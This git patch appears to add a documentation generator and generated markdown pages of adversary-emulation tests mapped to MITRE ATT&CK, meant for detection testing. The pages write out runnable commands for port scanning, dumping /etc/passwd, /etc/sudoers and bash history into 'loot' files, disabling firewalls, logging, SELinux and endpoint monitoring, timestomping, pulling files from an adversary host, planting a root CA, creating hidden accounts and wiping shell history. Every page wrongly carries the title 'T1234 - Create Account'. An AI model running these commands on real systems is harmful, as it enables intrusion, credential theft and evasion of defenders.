From 92de69a6d551a456ff79eb8e9d52f1d69a55121e Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Thu, 10 May 2018 13:26:34 -0600 Subject: [PATCH] first cut of atomic docs generator --- atomics/atomic_doc_template.md.erb | 33 +++++++++++++ atomics/t1046/t1046.md | 19 +++++++ atomics/t1087/t1087.md | 79 ++++++++++++++++++++++++++++++ atomics/t1089/t1089.md | 75 ++++++++++++++++++++++++++++ atomics/t1099/t1099.md | 62 +++++++++++++++++++++++ atomics/t1105/t1105.md | 48 ++++++++++++++++++ atomics/t1123/t1123.md | 34 +++++++++++++ atomics/t1130/t1130.md | 25 ++++++++++ atomics/t1136/t1136.md | 39 +++++++++++++++ atomics/t1139/t1139.md | 23 +++++++++ atomics/t1146/t1146.md | 78 +++++++++++++++++++++++++++++ atomics/t1148/t1148.md | 22 +++++++++ atomics/t1158/t1158.md | 16 ++++++ atomics/t1176/t1176.md | 50 +++++++++++++++++++ generate_atomic_docs.rb | 40 +++++++++++++++ 15 files changed, 643 insertions(+) create mode 100644 atomics/atomic_doc_template.md.erb create mode 100644 atomics/t1046/t1046.md create mode 100644 atomics/t1087/t1087.md create mode 100644 atomics/t1089/t1089.md create mode 100644 atomics/t1099/t1099.md create mode 100644 atomics/t1105/t1105.md create mode 100644 atomics/t1123/t1123.md create mode 100644 atomics/t1130/t1130.md create mode 100644 atomics/t1136/t1136.md create mode 100644 atomics/t1139/t1139.md create mode 100644 atomics/t1146/t1146.md create mode 100644 atomics/t1148/t1148.md create mode 100644 atomics/t1158/t1158.md create mode 100644 atomics/t1176/t1176.md create mode 100755 generate_atomic_docs.rb diff --git a/atomics/atomic_doc_template.md.erb b/atomics/atomic_doc_template.md.erb new file mode 100644 index 00000000..05404288 --- /dev/null +++ b/atomics/atomic_doc_template.md.erb @@ -0,0 +1,33 @@ +# <%= technique['identifier'] %> - <%= technique['name'] -%> +<%- if technique['identifier'].start_with? 'T' %> +MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>) +<% end -%> + +## Atomic Tests +<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%> + +### Test #<%= test_number+1 %> - <%= test['name'] %> +<%= test['description'] -%> + +**Supported Platforms:** <%= test['supported_platforms'].join(', ') %> + +<% if test['input_arguments'].to_a.count > 0 %> +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| +<% test['input_arguments'].each do |arg_name, arg_options| -%> + | <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>| +<% end -%> +<% end -%> + +<%- if test['executor']['name'] == 'manual' -%> +#### Run it with these steps! +<%= test['executor']['steps'] %> + +<%- else -%> +#### Run it with `<%= test['executor']['name'] %>`! +``` +<%= test['executor']['command'] %> +``` +<%- end -%> +<%- end -%> \ No newline at end of file diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md new file mode 100644 index 00000000..5be2cda7 --- /dev/null +++ b/atomics/t1046/t1046.md @@ -0,0 +1,19 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Scan a bunch of ports to see if they are open +xxx + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +for port in {1..65535}; +do + echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; +done + +``` diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md new file mode 100644 index 00000000..db6c3523 --- /dev/null +++ b/atomics/t1087/t1087.md @@ -0,0 +1,79 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - List all accounts +xxx + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +cat /etc/passwd > #{output_file} + +``` + +### Test #2 - View sudoers access +xxx (requires root) + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +cat /etc/sudoers > #{output_file} + +``` + +### Test #3 - View accounts with UID 0 +xxx + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +grep 'x:0:' /etc/passwd > #{output_file} + +``` + +### Test #4 - List opened files by user +xxx + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username + +``` + +### Test #5 - Show if a user account has ever logger in remotely +xxx + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +lastlog > #{output_file} + +``` diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md new file mode 100644 index 00000000..27b2f6c2 --- /dev/null +++ b/atomics/t1089/t1089.md @@ -0,0 +1,75 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Disable iptables firewall +Disables the iptables firewall + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; +then + service iptables stop + chkconfig off iptables + service ip6tables stop + chkconfig off ip6tables +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; + systemctl stop firewalld + systemctl disable firewalld +fi + +``` + +### Test #2 - Disable syslog +Disables syslog collection + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; +then + service rsyslog stop + chkconfig off rsyslog +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; + systemctl stop rsyslog + systemctl disable rsyslog +fi + +``` + +### Test #3 - Disable Cb Response +Disable the Cb Response service + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; +then + service cbdaemon stop + chkconfig off cbdaemon +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; + systemctl stop cbdaemon + systemctl disable cbdaemon +fi + +``` + +### Test #4 - Disable SELinux +Disables SELinux enforcement + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +setenforce 0 + +``` diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md new file mode 100644 index 00000000..90236c39 --- /dev/null +++ b/atomics/t1099/t1099.md @@ -0,0 +1,62 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Set a file's access timestamp +Stomps on the access timestamp of a file + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | target_filename | Path of file that we are going to stomp on last access time | Path | | + +#### Run it with `sh`! +``` +touch -a -t 197001010000.00 #{target_filename} + +``` + +### Test #2 - Set a file's modification timestamp +Stomps on the modification timestamp of a file + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | target_filename | Path of file that we are going to stomp on last access time | Path | | + +#### Run it with `sh`! +``` +touch -m -t 197001010000.00 #{target_filename} + +``` + +### Test #3 - Set a file's creation timestamp +Stomps on the create timestamp of a file + +Setting the creation timestamp requires changing the system clock and reverting. +Sudo or root privileges are required to change date. Use with caution. + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | target_filename | Path of file that we are going to stomp on last access time | Path | | + +#### Run it with `sh`! +``` +NOW=$(date) +date -s "1970-01-01 00:00:00" +touch #{target_filename} +date -s "$NOW" +stat #{target_filename} + +``` diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md new file mode 100644 index 00000000..f2c08d2c --- /dev/null +++ b/atomics/t1105/t1105.md @@ -0,0 +1,48 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - xxxx +xxxx + +**Supported Platforms:** linux, macos + + +#### Run it with `bash`! +``` +### TODO: Not sure how to handle commands that need to be run on multiple systems + +# Adversary System Configuration +# Ensure SSH access has been configured for an adversary account +echo "This file transferred by scp" > /tmp/adversary-scp +echo "This file transferred by sftp" > /tmp/adversary-sftp +mkdir /tmp/adversary-rsync +cd /tmp/adversary-rsync +touch a b c d e f g + +# Victim System Configuration +# Ensure SSH access has been configured for a victim account +# Ensure write access for victim account to this directory +mkdir /tmp/victim-files +cd /tmp/victim-files + +# Push files to victim using rsync +rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ + +# Pull files from adversary using rsync +rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ + +# Push files to victim using scp +scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ + +# Pull file from adversary using scp +scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file + +# Push files to victim using sftp +sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' + +# Pull file from adversary using sftp +sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file + +``` diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md new file mode 100644 index 00000000..7d671839 --- /dev/null +++ b/atomics/t1123/t1123.md @@ -0,0 +1,34 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - SourceRecorder via Windows command prompt +Create a file called test.wma, with the duration of 30 seconds + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path to the recording file being captured | Path | test.wma| + | duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30| + +#### Run it with `command_prompt`! +``` +SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} + +``` + +### Test #2 - PowerShell Cmdlet via Windows command prompt +[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet + +``` diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md new file mode 100644 index 00000000..275f1201 --- /dev/null +++ b/atomics/t1130/t1130.md @@ -0,0 +1,25 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Install root CA on CentOS/RHEL +Creates a root CA with openssl + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +openssl genrsa -out #{key_filename} 4096 +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} + +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; +then + cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ]; + cp rootCA.crt /etc/pki/ca-trust/source/anchors/ + update-ca-trust +fi + +``` diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md new file mode 100644 index 00000000..57bddbb2 --- /dev/null +++ b/atomics/t1136/t1136.md @@ -0,0 +1,39 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Create a user account on a Linux system +Create a user via useradd + +**Supported Platforms:** linux + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | username | Username of the user to create | String | evil_user| + | comment | Comment to record when creating the user | String | Evil Account| + +#### Run it with `bash`! +``` +useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} + +``` + +### Test #2 - Create a user account on a MacOS system +Creates a user on a MacOS system with dscl + +**Supported Platforms:** macos + + +#### Run it with `bash`! +``` +dscl . -create /Users/#{username} +dscl . -create /Users/#{username} UserShell /bin/bash +dscl . -create /Users/#{username} RealName "#{realname}" +dscl . -create /Users/#{username} UniqueID "1010" +dscl . -create /Users/#{username} PrimaryGroupID 80 +dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} + +``` diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md new file mode 100644 index 00000000..2b6ec279 --- /dev/null +++ b/atomics/t1139/t1139.md @@ -0,0 +1,23 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - xxxx +xxxx + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history| + | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} + +``` diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md new file mode 100644 index 00000000..208aa00f --- /dev/null +++ b/atomics/t1146/t1146.md @@ -0,0 +1,78 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Clear Bash history (rm) +Clears bash history via rm + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +rm ~/.bash_history + +``` + +### Test #2 - Clear Bash history (echo) +Clears bash history via rm + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +echo "" > ~/.bash_history + +``` + +### Test #3 - Clear Bash history (cat dev/null) +Clears bash history via cat /dev/null + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +cat /dev/null > ~/.bash_history + +``` + +### Test #4 - Clear Bash history (ln dev/null) +Clears bash history via a symlink to /dev/null + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +ln -sf /dev/null ~/.bash_history + +``` + +### Test #5 - Clear Bash history (truncate) +Clears bash history via truncate + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +truncate -s0 ~/.bash_history + +``` + +### Test #6 - Clear history of a bunch of shells +Clears the history of a bunch of different shell types by setting the history size to zero + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +unset HISTFILE +export HISTFILESIZE=0 +history -c + +``` diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md new file mode 100644 index 00000000..48c436ba --- /dev/null +++ b/atomics/t1148/t1148.md @@ -0,0 +1,22 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Disable history collection +Disables history collection in shells + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | evil_command | Command to run after shell history collection is disabled | String | whoami| + +#### Run it with `sh`! +``` +export HISTCONTROL=ignoreboth +ls #{evil_command} + +``` diff --git a/atomics/t1158/t1158.md b/atomics/t1158/t1158.md new file mode 100644 index 00000000..5e5febb9 --- /dev/null +++ b/atomics/t1158/t1158.md @@ -0,0 +1,16 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Create a hidden file in a hidden directory +Creates a hidden file inside a hidden directory + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +mkdir .hidden-directory +echo "this file is hidden" > .hidden-directory/.hidden-file +``` diff --git a/atomics/t1176/t1176.md b/atomics/t1176/t1176.md new file mode 100644 index 00000000..213b43bb --- /dev/null +++ b/atomics/t1176/t1176.md @@ -0,0 +1,50 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Chrome (Developer Mode) +xxx + +**Supported Platforms:** linux, windows, macos + + +#### Run it with these steps! +1. Navigate to [chrome://extensions](chrome://extensions) and +tick 'Developer Mode'. + +2. Click 'Load unpacked extension...' and navigate to +[Browser_Extension](../t1176/) + +3. Click 'Select' + + + +### Test #2 - Chrome (Chrome Web Store) +xxx + +**Supported Platforms:** linux, windows, macos + + +#### Run it with these steps! +1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend +in Chrome + +2. Click 'Add to Chrome' + + + +### Test #3 - Firefox +Create a file called test.wma, with the duration of 30 seconds + +**Supported Platforms:** linux, windows, macos + + +#### Run it with these steps! +1. Navigate to [about:debugging](about:debugging) and +click "Load Temporary Add-on" + +2. Navigate to [manifest.json](./manifest.json) + +3. Then click 'Open' + diff --git a/generate_atomic_docs.rb b/generate_atomic_docs.rb new file mode 100755 index 00000000..20ebaf6a --- /dev/null +++ b/generate_atomic_docs.rb @@ -0,0 +1,40 @@ +#! /usr/bin/env ruby +require 'yaml' +require 'ostruct' +require 'erb' + +def generate_docs!(path) + atomic_yaml = YAML.load(File.read path) + + technique = { + # TODO GET FROM MITRE + 'identifier' => "T1234", + 'name' => "Create Account", + } + + template = ERB.new File.read("#{File.dirname(__FILE__)}/atomics/atomic_doc_template.md.erb"), nil, "-" + generated_doc = template.result(binding) + + output_doc_path = path.gsub(/.yaml/, '.md') + print " => #{output_doc_path} => " + File.write output_doc_path, generated_doc +end + +oks = [] +fails = [] + +Dir["#{File.dirname(__FILE__)}/atomics/t*/t*.yaml"].sort.each do |path| + begin + print "Generating docs for #{path}" + generate_docs! path + puts "OK" + rescue => ex + fails << path + puts "FAIL (#{ex} #{ex.backtrace.join("\n")})" + end +end + +puts +puts "Generated docs for #{oks.count} techniques, #{fails.count} failures" + +exit fails.count \ No newline at end of file